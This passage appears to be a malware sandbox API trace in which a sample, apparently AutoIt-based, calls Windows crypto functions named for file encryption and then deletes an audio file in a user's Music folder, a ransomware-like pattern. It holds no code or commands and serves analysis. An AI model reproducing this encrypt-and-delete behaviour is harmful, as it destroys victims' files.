[0114.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.322] WriteFile (in: hFile=0x258, lpBuffer=0x43faa98*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43faa98*, lpNumberOfBytesWritten=0x144ef3c*=0x670, lpOverlapped=0x0) returned 1 [0114.385] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0114.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0114.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0114.386] CryptDestroyKey (hKey=0x41ac640) returned 1 [0114.436] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0114.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.437] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0114.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0114.437] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0114.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.437] FreeLibrary (hLibModule=0x756e0000) returned 1 [0114.437] CloseHandle (hObject=0x298) returned 1 [0114.438] CloseHandle (hObject=0x258) returned 1 [0114.439] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a", lpFilePart=0x0) returned 0x2f [0114.439] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\0csxpxrus0a.m4a")) returned 0x20 [0114.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0114.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0114.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0114.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0114.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0114.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0114.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cff1b20, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0x7fab7d20, ftLastAccessTime.dwHighDateTime=0x1d5ede0, ftLastWriteTime.dwLowDateTime=0x7fab7d20, ftLastWriteTime.dwHighDateTime=0x1d5ede0, nFileSizeHigh=0x0, nFileSizeLow=0x66d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0csxPXrUs0a.m4a", cAlternateFileName="0CSXPX~1.M4A")) returned 0x41ac500 [0114.440] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\0csxPXrUs0a.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\0csxpxrus0a.m4a")) returned 1 [0114.579] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cff1b20, ftCreationTime.dwHighDateTime=0x1d5e773, ftLastAccessTime.dwLowDateTime=0x7fab7d20, ftLastAccessTime.dwHighDateTime=0x1d5ede0, ftLastWriteTime.dwLowDateTime=0x7fab7d20, ftLastWriteTime.dwHighDateTime=0x1d5ede0, nFileSizeHigh=0x0, nFileSizeLow=0x66d, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="0csxPXrUs0a.m4a", cAlternateFileName="0CSXPX~1.M4A")) returned 0 [0114.579] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0114.580] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0114.580] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0114.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0114.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0114.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0114.581] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0114.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2360 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0114.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0114.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0114.582] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0114.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0114.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0114.583] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0114.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0114.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0114.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0114.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0114.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0114.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0114.583] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\mxXesXXst_.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90484ba0, ftCreationTime.dwHighDateTime=0x1d5e43e, ftLastAccessTime.dwLowDateTime=0x6dab5fe0, ftLastAccessTime.dwHighDateTime=0x1d5e580, ftLastWriteTime.dwLowDateTime=0x6dab5fe0, ftLastWriteTime.dwHighDateTime=0x1d5e580, nFileSizeHigh=0x0, nFileSizeLow=0xbdad, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="mxXesXXst_.mp3", cAlternateFileName="MXXESX~1.MP3")) returned 0x41ac280 [0114.583] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0114.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0114.584] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0d0 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0114.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0114.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0114.585] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0114.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0114.585] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0114.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0114.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0114.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0114.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0114.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0114.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0114.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0114.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0114.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0114.588] RtlAllocateHeap 